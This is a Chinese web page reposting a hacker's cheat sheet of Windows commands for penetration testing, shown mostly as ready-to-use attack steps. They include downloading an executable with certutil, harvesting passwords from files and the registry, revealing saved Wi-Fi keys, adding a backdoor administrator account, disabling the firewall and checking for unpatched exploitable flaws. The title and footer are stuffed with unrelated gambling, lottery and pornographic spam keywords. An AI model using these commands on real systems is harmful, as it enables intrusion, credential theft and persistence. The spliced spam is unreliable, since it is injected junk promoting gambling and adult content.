安基網 首頁 安全 滲透測試 查看內容

雪缘园即时比分网:「滲透基礎」-黑客常用Windows命令筆記

英超雪缘园 www.trual.com.cn 2019-12-29 11:10| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 如果我有七個小時的時間來砍樹,那么我一定會花6個小時來磨我的斧頭!滲透命令:certutil-----從遠程url下載文件案例:certutil -urlcache -split -f //baidu.com/test.exefindstr-----查找文件后綴結果findstr /s /i "pass" *.py*reg query HKLM /f password /t REG_SZ /s-----搜集注 ...


如果我有七個小時的時間來砍樹,那么我一定會花6個小時來磨我的斧頭!


滲透命令:

certutil-----從遠程url下載文件

案例:certutil -urlcache -split -f //baidu.com/test.exe


findstr-----查找文件后綴結果

findstr /s /i "pass" *.py*

reg query HKLM /f password /t REG_SZ /s-----搜集注冊表中的各種密碼數據


查看有沒有開啟遠程鏈接,運行下面命令:

REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

結果:1表示關閉,0表示開啟


快速查找未打補丁的exp

systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i "%i"|| @echo %i you can exp)&del /f /q /a bzhack.txt


常用命令:

ipconfig/all-----網絡配置情況

ipconfig /displaydns-----查看本地DNS緩存

netsh wlan show profile-----查看連接過的 wifi 名

netsh wlan show profile WiFi-name key=clear 獲取 wifi 對應的的密碼

query user-----查當前機器中正在線的用戶,看管理員在不在

net view------顯示域列表/計算機列表

net user------查看當前所有賬號,判斷域規模

net group-----查看當前域所有的組名

net user bzhack pass /add-----增加用戶

net user bzhack /del-----刪除用戶

net Localgroup-----添加、顯示本地組

net localgroup administrators bzhack /add-----將bzhack加入管理員組

net share----- 查看當前機器開啟的共享


文件操作:

md-----建文件夾

rd-----刪除文件夾

tree-----顯示文件夾結構

dir-----顯示磁盤目錄內容

copy-----復制文件

Xcopy-----copy加強版,復制文件夾

del-----刪除文件

ren-----[原文件/夾名][新文件/夾名]修改文件名

type-----查看文本內容

dir /a /s /b d:"*.conf"-----搜索d盤里conf結尾的文件

edit-----文本編輯

type-----顯示文件內容


網絡命令:

netstat -a----- 列出所有端口

netstat -p----- 顯示 PID 和進程名稱

netstat -r----- 顯示核心路由信息

netstat -at-----列出所有tcp連接

netstat -au-----列出所有ucp連接

netstat -an |find "3389" 查看開啟3389端口的信息

netstat -ano | findstr "ESTABLISHED" 查看當前正處于連接狀態的端口及ip

netstat -ano | findstr "LISTENING" 查看當前正處于監聽狀態的端口及ip

其他命令

ver-----查看版本

hostname-----查看機器名

whoami-----查看權限

systeminfo-----查看配置

tasklist-----查看進程

cls-----清屏

net start-----查看開啟的服務,比如Terminal Services 遠程連接服務

net stop sharedaccess-----關閉防火墻

set-----查看當前機器的環境變量,看有沒有我們可以直接利用到的語言環境

fsutil fsinfo drives-----列出當前機器上的所有盤符



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6775448574621647363/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

相關閱讀

最新評論

 最新
返回頂部
{ganrao} 著名av女优 美的股票 火箭vs开拓者 好运南京麻将安卓版 快播动漫黄色片qvod 河北十一选五今日开 场外配资表现形式 上马麻里子喷奶完整版视频 江苏11选5开奖记 产业基金配资是真的吗 澳客篮球比分直播最快最准 澳洲幸运5是官方网站 江苏快3 吉泽明步最经典的5部作品 上海明星麻将app 吉林11选5走势图